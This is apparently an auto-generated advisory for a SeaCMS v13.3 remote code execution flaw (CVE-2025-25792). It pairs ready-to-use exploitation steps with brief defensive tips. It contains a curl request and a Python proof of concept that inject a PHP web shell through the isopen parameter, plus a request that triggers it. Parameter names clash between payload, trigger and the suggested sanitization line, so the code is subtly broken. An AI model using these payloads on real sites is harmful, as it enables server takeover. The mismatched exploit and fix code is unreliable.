How CVE-2025-25792 Works
SeaCMS v13.3 contains an unauthenticated RCE vulnerability in `admin_weixin.php` due to improper input validation of the `isopen` parameter. Attackers can inject malicious PHP code via crafted HTTP requests, which is then executed on the server due to insufficient sanitization. The vulnerability arises from direct file write operations combined with user-controlled input, allowing arbitrary code execution under web server privileges.
DailyCVE Form:
Platform: SeaCMS
Version: v13.3
Vulnerability: RCE
Severity: Critical
Date: 03/28/2025
What Undercode Say:
Exploitation:
1. Craft Payload:
curl -X POST "http://target/admin_weixin.php" -d "isopen=<?php system(\$_GET[bash]); ?>"
2. Trigger Execution:
GET /uploads/weixin_config.php?cmd=id HTTP/1.1 Host: target
Protection:
1. Patch: Apply vendor updates.
2. WAF Rules:
location ~ admin_weixin.php {
deny all;
}
3. Input Sanitization:
$isopen = htmlspecialchars($_POST[bash], ENT_QUOTES);
Detection:
grep -r "isopen" /var/www/seacms/
Mitigation Commands:
1. Restrict Permissions:
chmod 640 admin_weixin.php
2. Log Monitoring:
tail -f /var/log/apache2/access.log | grep "admin_weixin.php"
Exploit Code (PoC):
import requests
target = "http://victim.com/admin_weixin.php"
payload = {"isopen": "<?php exec($_GET[bash]); ?>"}
requests.post(target, data=payload)
Post-Exploit Analysis:
find / -name "weixin_config.php" -exec ls -la {} \;
Patch Verification:
diff -u admin_weixin.php.old admin_weixin.php.new
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25792
Extra Source Hub:
Undercode
